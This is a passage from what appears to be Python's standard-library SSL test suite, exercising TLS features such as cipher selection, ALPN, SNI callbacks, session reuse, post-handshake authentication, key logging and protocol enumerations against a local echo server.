client_context, server_context, hostname = testing_context()
# test scenario needs TLS <= 1.2
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
server_context.load_dh_params(DHFILE)
server_context.set_ciphers("kEDH")
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher[0])
def test_ecdh_curve(self):
# server secp384r1, client auto
client_context, server_context, hostname = testing_context()
server_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
# server auto, client secp384r1
client_context, server_context, hostname = testing_context()
client_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
# server / client curve mismatch
client_context, server_context, hostname = testing_context()
client_context.set_ecdh_curve("prime256v1")
server_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
with self.assertRaises(ssl.SSLError):
server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
def test_selected_alpn_protocol(self):
# selected_alpn_protocol() is None unless ALPN is used.
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
def test_selected_alpn_protocol_if_server_uses_alpn(self):
# selected_alpn_protocol() is None unless ALPN is used by the client.
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(['foo', 'bar'])
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
def test_alpn_protocols(self):
server_protocols = ['foo', 'bar', 'milkshake']
protocol_tests = [
(['foo', 'bar'], 'foo'),
(['bar', 'foo'], 'foo'),
(['milkshake'], 'milkshake'),
(['http/3.0', 'http/4.0'], None)
]
for client_protocols, expected in protocol_tests:
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(server_protocols)
client_context.set_alpn_protocols(client_protocols)
try:
stats = server_params_test(client_context,
server_context,
chatty=True,
connectionchatty=True,
sni_name=hostname)
except ssl.SSLError as e:
stats = e
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_alpn_protocol']
self.assertEqual(client_result, expected,
msg % (client_result, "client"))
server_result = stats['server_alpn_protocols'][-1] \
if len(stats['server_alpn_protocols']) else 'nothing'
self.assertEqual(server_result, expected,
msg % (server_result, "server"))
def test_npn_protocols(self):
assert not ssl.HAS_NPN
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
client_context.check_hostname = False
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
        # SIGNED_CERTFILE2 (subject CN 'fakehostname') was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
self.assertEqual(calls, [])
def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_raising(ssl_sock, server_name, initial_context):
1/0
server_context.set_servername_callback(cb_raising)
with support.catch_unraisable_exception() as catch:
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason,
'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertEqual(catch.unraisable.exc_type, ZeroDivisionError)
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with support.catch_unraisable_exception() as catch:
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertEqual(catch.unraisable.exc_type, TypeError)
def test_shared_ciphers(self):
client_context, server_context, hostname = testing_context()
client_context.set_ciphers("AES128:AES256")
server_context.set_ciphers("AES256")
expected_algs = [
"AES256", "AES-256",
# TLS 1.3 ciphers are always enabled
"TLS_CHACHA20", "TLS_AES",
]
stats = server_params_test(client_context, server_context,
sni_name=hostname)
ciphers = stats['server_shared_ciphers'][0]
self.assertGreater(len(ciphers), 0)
for name, tls_version, bits in ciphers:
if not any(alg in name for alg in expected_algs):
self.fail(name)
def test_read_write_after_close_raises_valuerror(self):
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
s = client_context.wrap_socket(socket.socket(),
server_hostname=hostname)
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_sendfile(self):
TEST_DATA = b"x" * 512
with open(os_helper.TESTFN, 'wb') as f:
f.write(TEST_DATA)
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
with open(os_helper.TESTFN, 'rb') as file:
s.sendfile(file)
self.assertEqual(s.recv(1024), TEST_DATA)
def test_session(self):
client_context, server_context, hostname = testing_context()
# TODO: sessions aren't compatible with TLSv1.3 yet
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# first connection without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
session = stats['session']
self.assertTrue(session.id)
self.assertGreater(session.time, 0)
self.assertGreater(session.timeout, 0)
self.assertTrue(session.has_ticket)
self.assertGreater(session.ticket_lifetime_hint, 0)
self.assertFalse(stats['session_reused'])
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 1)
self.assertEqual(sess_stat['hits'], 0)
# reuse session
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 2)
self.assertEqual(sess_stat['hits'], 1)
self.assertTrue(stats['session_reused'])
session2 = stats['session']
self.assertEqual(session2.id, session.id)
self.assertEqual(session2, session)
self.assertIsNot(session2, session)
self.assertGreaterEqual(session2.time, session.time)
self.assertGreaterEqual(session2.timeout, session.timeout)
# another one without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
self.assertFalse(stats['session_reused'])
session3 = stats['session']
self.assertNotEqual(session3.id, session.id)
self.assertNotEqual(session3, session)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 3)
self.assertEqual(sess_stat['hits'], 1)
# reuse session again
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
self.assertTrue(stats['session_reused'])
session4 = stats['session']
self.assertEqual(session4.id, session.id)
self.assertEqual(session4, session)
self.assertGreaterEqual(session4.time, session.time)
self.assertGreaterEqual(session4.timeout, session.timeout)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 4)
self.assertEqual(sess_stat['hits'], 2)
def test_session_handling(self):
client_context, server_context, hostname = testing_context()
client_context2, _, _ = testing_context()
# TODO: session reuse does not work with TLSv1.3
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
client_context2.maximum_version = ssl.TLSVersion.TLSv1_2
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# session is None before handshake
self.assertEqual(s.session, None)
self.assertEqual(s.session_reused, None)
s.connect((HOST, server.port))
session = s.session
self.assertTrue(session)
with self.assertRaises(TypeError) as e:
s.session = object
self.assertEqual(str(e.exception), 'Value is not a SSLSession.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# cannot set session after handshake
with self.assertRaises(ValueError) as e:
s.session = session
self.assertEqual(str(e.exception),
'Cannot set session after handshake.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
                # the session can be set before the handshake and before the
                # connection is established
s.session = session
s.connect((HOST, server.port))
self.assertEqual(s.session.id, session.id)
self.assertEqual(s.session, session)
self.assertEqual(s.session_reused, True)
with client_context2.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# cannot re-use session with a different SSLContext
with self.assertRaises(ValueError) as e:
s.session = session
s.connect((HOST, server.port))
self.assertEqual(str(e.exception),
'Session refers to a different SSLContext.')
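# The post-handshake authentication (PHA) tests below drive a small line-based
# command protocol implemented by the echo server's connection handler
# (presumably defined earlier in this file): b'HASCERT' answers TRUE/FALSE
# depending on whether a client certificate was received, b'PHA' triggers
# verify_client_post_handshake() and answers OK, and b'GETCERT' returns the
# client certificate as text.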
@unittest.skipUnless(has_tls_version('TLSv1_3'), "Test needs TLS 1.3")
class TestPostHandshakeAuth(unittest.TestCase):
def test_pha_setter(self):
protocols = [
ssl.PROTOCOL_TLS_SERVER, ssl.PROTOCOL_TLS_CLIENT
]
for protocol in protocols:
ctx = ssl.SSLContext(protocol)
self.assertEqual(ctx.post_handshake_auth, False)
ctx.post_handshake_auth = True
self.assertEqual(ctx.post_handshake_auth, True)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.post_handshake_auth, True)
ctx.post_handshake_auth = False
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.post_handshake_auth, False)
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.post_handshake_auth = True
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
self.assertEqual(ctx.post_handshake_auth, True)
def test_pha_required(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# PHA method just returns true when cert is already available
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'GETCERT')
cert_text = s.recv(4096).decode('us-ascii')
self.assertIn('Python Software Foundation CA', cert_text)
def test_pha_required_nocert(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
def msg_cb(conn, direction, version, content_type, msg_type, data):
if support.verbose and content_type == _TLSContentType.ALERT:
info = (conn, direction, version, content_type, msg_type, data)
sys.stdout.write(f"TLS: {info!r}\n")
server_context._msg_callback = msg_cb
client_context._msg_callback = msg_cb
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname,
suppress_ragged_eofs=False) as s:
s.connect((HOST, server.port))
s.write(b'PHA')
                # The test sometimes fails with an EOF error; it passes as
                # long as the server aborts the connection with an error.
with self.assertRaisesRegex(
ssl.SSLError,
'(certificate required|EOF occurred)'
):
# receive CertificateRequest
data = s.recv(1024)
self.assertEqual(data, b'OK\n')
# send empty Certificate + Finish
s.write(b'HASCERT')
# receive alert
s.recv(1024)
def test_pha_optional(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
# check CERT_OPTIONAL
server_context.verify_mode = ssl.CERT_OPTIONAL
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
def test_pha_optional_nocert(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_OPTIONAL
client_context.post_handshake_auth = True
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
                # CERT_OPTIONAL does not fail when the client has no cert
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
def test_pha_no_pha_client(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
with self.assertRaisesRegex(ssl.SSLError, 'not server'):
s.verify_client_post_handshake()
s.write(b'PHA')
self.assertIn(b'extension not received', s.recv(1024))
def test_pha_no_pha_server(self):
# server doesn't have PHA enabled, cert is requested in handshake
client_context, server_context, hostname = testing_context()
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# PHA doesn't fail if there is already a cert
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
def test_pha_not_tls13(self):
# TLS 1.2
client_context, server_context, hostname = testing_context()
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# PHA fails for TLS != 1.3
s.write(b'PHA')
self.assertIn(b'WRONG_SSL_VERSION', s.recv(1024))
def test_bpo37428_pha_cert_none(self):
# verify that post_handshake_auth does not implicitly enable cert
# validation.
hostname = SIGNED_CERTFILE_HOSTNAME
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
# no cert validation and CA on client side
client_context.check_hostname = False
client_context.verify_mode = ssl.CERT_NONE
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
server_context.load_verify_locations(SIGNING_CA)
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# server cert has not been validated
self.assertEqual(s.getpeercert(), {})
def test_internal_chain_client(self):
client_context, server_context, hostname = testing_context(
server_chain=False
)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname
) as s:
s.connect((HOST, server.port))
vc = s._sslobj.get_verified_chain()
self.assertEqual(len(vc), 2)
ee, ca = vc
uvc = s._sslobj.get_unverified_chain()
self.assertEqual(len(uvc), 1)
self.assertEqual(ee, uvc[0])
self.assertEqual(hash(ee), hash(uvc[0]))
self.assertEqual(repr(ee), repr(uvc[0]))
self.assertNotEqual(ee, ca)
self.assertNotEqual(hash(ee), hash(ca))
self.assertNotEqual(repr(ee), repr(ca))
self.assertNotEqual(ee.get_info(), ca.get_info())
self.assertIn("CN=localhost", repr(ee))
self.assertIn("CN=our-ca-server", repr(ca))
pem = ee.public_bytes(_ssl.ENCODING_PEM)
der = ee.public_bytes(_ssl.ENCODING_DER)
self.assertIsInstance(pem, str)
self.assertIn("-----BEGIN CERTIFICATE-----", pem)
self.assertIsInstance(der, bytes)
self.assertEqual(
ssl.PEM_cert_to_DER_cert(pem), der
)
def test_internal_chain_server(self):
client_context, server_context, hostname = testing_context()
client_context.load_cert_chain(SIGNED_CERTFILE)
server_context.verify_mode = ssl.CERT_REQUIRED
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname
) as s:
s.connect((HOST, server.port))
s.write(b'VERIFIEDCHAIN\n')
res = s.recv(1024)
self.assertEqual(res, b'\x02\n')
s.write(b'UNVERIFIEDCHAIN\n')
res = s.recv(1024)
self.assertEqual(res, b'\x02\n')
HAS_KEYLOG = hasattr(ssl.SSLContext, 'keylog_filename')
requires_keylog = unittest.skipUnless(
HAS_KEYLOG, 'test requires OpenSSL 1.1.1 with keylog callback')
class TestSSLDebug(unittest.TestCase):
def keylog_lines(self, fname=os_helper.TESTFN):
with open(fname) as f:
return len(list(f))
@requires_keylog
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_keylog_defaults(self):
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.keylog_filename, None)
self.assertFalse(os.path.isfile(os_helper.TESTFN))
ctx.keylog_filename = os_helper.TESTFN
self.assertEqual(ctx.keylog_filename, os_helper.TESTFN)
self.assertTrue(os.path.isfile(os_helper.TESTFN))
self.assertEqual(self.keylog_lines(), 1)
ctx.keylog_filename = None
self.assertEqual(ctx.keylog_filename, None)
with self.assertRaises((IsADirectoryError, PermissionError)):
# Windows raises PermissionError
ctx.keylog_filename = os.path.dirname(
os.path.abspath(os_helper.TESTFN))
with self.assertRaises(TypeError):
ctx.keylog_filename = 1
@requires_keylog
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_keylog_filename(self):
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
client_context, server_context, hostname = testing_context()
client_context.keylog_filename = os_helper.TESTFN
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# header, 5 lines for TLS 1.3
self.assertEqual(self.keylog_lines(), 6)
client_context.keylog_filename = None
server_context.keylog_filename = os_helper.TESTFN
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertGreaterEqual(self.keylog_lines(), 11)
client_context.keylog_filename = os_helper.TESTFN
server_context.keylog_filename = os_helper.TESTFN
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertGreaterEqual(self.keylog_lines(), 21)
client_context.keylog_filename = None
server_context.keylog_filename = None
@requires_keylog
@unittest.skipIf(sys.flags.ignore_environment,
"test is not compatible with ignore_environment")
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_keylog_env(self):
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with unittest.mock.patch.dict(os.environ):
os.environ['SSLKEYLOGFILE'] = os_helper.TESTFN
self.assertEqual(os.environ['SSLKEYLOGFILE'], os_helper.TESTFN)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.keylog_filename, None)
ctx = ssl.create_default_context()
self.assertEqual(ctx.keylog_filename, os_helper.TESTFN)
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.keylog_filename, os_helper.TESTFN)
def test_msg_callback(self):
client_context, server_context, hostname = testing_context()
def msg_cb(conn, direction, version, content_type, msg_type, data):
pass
self.assertIs(client_context._msg_callback, None)
client_context._msg_callback = msg_cb
self.assertIs(client_context._msg_callback, msg_cb)
with self.assertRaises(TypeError):
client_context._msg_callback = object()
def test_msg_callback_tls12(self):
client_context, server_context, hostname = testing_context()
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
msg = []
def msg_cb(conn, direction, version, content_type, msg_type, data):
self.assertIsInstance(conn, ssl.SSLSocket)
self.assertIsInstance(data, bytes)
self.assertIn(direction, {'read', 'write'})
msg.append((direction, version, content_type, msg_type))
client_context._msg_callback = msg_cb
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertIn(
("read", TLSVersion.TLSv1_2, _TLSContentType.HANDSHAKE,
_TLSMessageType.SERVER_KEY_EXCHANGE),
msg
)
self.assertIn(
("write", TLSVersion.TLSv1_2, _TLSContentType.CHANGE_CIPHER_SPEC,
_TLSMessageType.CHANGE_CIPHER_SPEC),
msg
)
def test_msg_callback_deadlock_bpo43577(self):
client_context, server_context, hostname = testing_context()
server_context2 = testing_context()[1]
def msg_cb(conn, direction, version, content_type, msg_type, data):
pass
def sni_cb(sock, servername, ctx):
sock.context = server_context2
server_context._msg_callback = msg_cb
server_context.sni_callback = sni_cb
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
class TestEnumerations(unittest.TestCase):
def test_tlsversion(self):
class CheckedTLSVersion(enum.IntEnum):
MINIMUM_SUPPORTED = _ssl.PROTO_MINIMUM_SUPPORTED
SSLv3 = _ssl.PROTO_SSLv3
TLSv1 = _ssl.PROTO_TLSv1
TLSv1_1 = _ssl.PROTO_TLSv1_1
TLSv1_2 = _ssl.PROTO_TLSv1_2
TLSv1_3 = _ssl.PROTO_TLSv1_3
MAXIMUM_SUPPORTED = _ssl.PROTO_MAXIMUM_SUPPORTED
enum._test_simple_enum(CheckedTLSVersion, TLSVersion)
def test_tlscontenttype(self):
class Checked_TLSContentType(enum.IntEnum):
"""Content types (record layer)
See RFC 8446, section B.1
"""
CHANGE_CIPHER_SPEC = 20
ALERT = 21
HANDSHAKE = 22
APPLICATION_DATA = 23
# pseudo content types
HEADER = 0x100
INNER_CONTENT_TYPE = 0x101
enum._test_simple_enum(Checked_TLSContentType, _TLSContentType)
def test_tlsalerttype(self):
class Checked_TLSAlertType(enum.IntEnum):
"""Alert types for TLSContentType.ALERT messages
See RFC 8446, section B.2
"""
CLOSE_NOTIFY = 0
UNEXPECTED_MESSAGE = 10
BAD_RECORD_MAC = 20
DECRYPTION_FAILED = 21
RECORD_OVERFLOW = 22
DECOMPRESSION_FAILURE = 30
HANDSHAKE_FAILURE = 40
NO_CERTIFICATE = 41
BAD_CERTIFICATE = 42
UNSUPPORTED_CERTIFICATE = 43
CERTIFICATE_REVOKED = 44
CERTIFICATE_EXPIRED = 45
CERTIFICATE_UNKNOWN = 46
ILLEGAL_PARAMETER = 47
UNKNOWN_CA = 48
ACCESS_DENIED = 49
DECODE_ERROR = 50
DECRYPT_ERROR = 51
EXPORT_RESTRICTION = 60
PROTOCOL_VERSION = 70
INSUFFICIENT_SECURITY = 71
INTERNAL_ERROR = 80
INAPPROPRIATE_FALLBACK = 86
USER_CANCELED = 90
NO_RENEGOTIATION = 100
MISSING_EXTENSION = 109
UNSUPPORTED_EXTENSION = 110
CERTIFICATE_UNOBTAINABLE = 111
UNRECOGNIZED_NAME = 112
BAD_CERTIFICATE_STATUS_RESPONSE = 113
BAD_CERTIFICATE_HASH_VALUE = 114
UNKNOWN_PSK_IDENTITY = 115
CERTIFICATE_REQUIRED = 116
NO_APPLICATION_PROTOCOL = 120
enum._test_simple_enum(Checked_TLSAlertType, _TLSAlertType)
def test_tlsmessagetype(self):
class Checked_TLSMessageType(enum.IntEnum):
"""Message types (handshake protocol)
See RFC 8446, section B.3
"""
HELLO_REQUEST = 0
CLIENT_HELLO = 1
SERVER_HELLO = 2
HELLO_VERIFY_REQUEST = 3
NEWSESSION_TICKET = 4
END_OF_EARLY_DATA = 5
HELLO_RETRY_REQUEST = 6
ENCRYPTED_EXTENSIONS = 8
CERTIFICATE = 11
SERVER_KEY_EXCHANGE = 12
CERTIFICATE_REQUEST = 13
SERVER_DONE = 14
CERTIFICATE_VERIFY = 15
CLIENT_KEY_EXCHANGE = 16
FINISHED = 20
CERTIFICATE_URL = 21
CERTIFICATE_STATUS = 22
SUPPLEMENTAL_DATA = 23
KEY_UPDATE = 24
NEXT_PROTO = 67
MESSAGE_HASH = 254
CHANGE_CIPHER_SPEC = 0x0101
enum._test_simple_enum(Checked_TLSMessageType, _TLSMessageType)
def test_sslmethod(self):
Checked_SSLMethod = enum._old_convert_(
enum.IntEnum, '_SSLMethod', 'ssl',
lambda name: name.startswith('PROTOCOL_') and name != 'PROTOCOL_SSLv23',
source=ssl._ssl,
)
enum._test_simple_enum(Checked_SSLMethod, ssl._SSLMethod)
def test_options(self):
CheckedOptions = enum._old_convert_(
enum.IntFlag, 'Options', 'ssl',
lambda name: name.startswith('OP_'),
source=ssl._ssl,
)
enum._test_simple_enum(CheckedOptions, ssl.Options)
def test_alertdescription(self):
CheckedAlertDescription = enum._old_convert_(
enum.IntEnum, 'AlertDescription', 'ssl',
lambda name: name.startswith('ALERT_DESCRIPTION_'),
source=ssl._ssl,
)
enum._test_simple_enum(CheckedAlertDescription, ssl.AlertDescription)
def test_sslerrornumber(self):
Checked_SSLErrorNumber = enum._old_convert_(
enum.IntEnum, 'SSLErrorNumber', 'ssl',
lambda name: name.startswith('SSL_ERROR_'),
source=ssl._ssl,
)
enum._test_simple_enum(Checked_SSLErrorNumber, ssl.SSLErrorNumber)
def test_verifyflags(self):
CheckedVerifyFlags = enum._old_convert_(
enum.IntFlag, 'VerifyFlags', 'ssl',
lambda name: name.startswith('VERIFY_'),
source=ssl._ssl,
)
enum._test_simple_enum(CheckedVerifyFlags, ssl.VerifyFlags)
def test_verifymode(self):
CheckedVerifyMode = enum._old_convert_(
enum.IntEnum, 'VerifyMode', 'ssl',
lambda name: name.startswith('CERT_'),
source=ssl._ssl,
)
enum._test_simple_enum(CheckedVerifyMode, ssl.VerifyMode)
def test_main(verbose=False):
if support.verbose:
plats = {
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
try:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
except AttributeError:
pass
for filename in [
CERTFILE, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
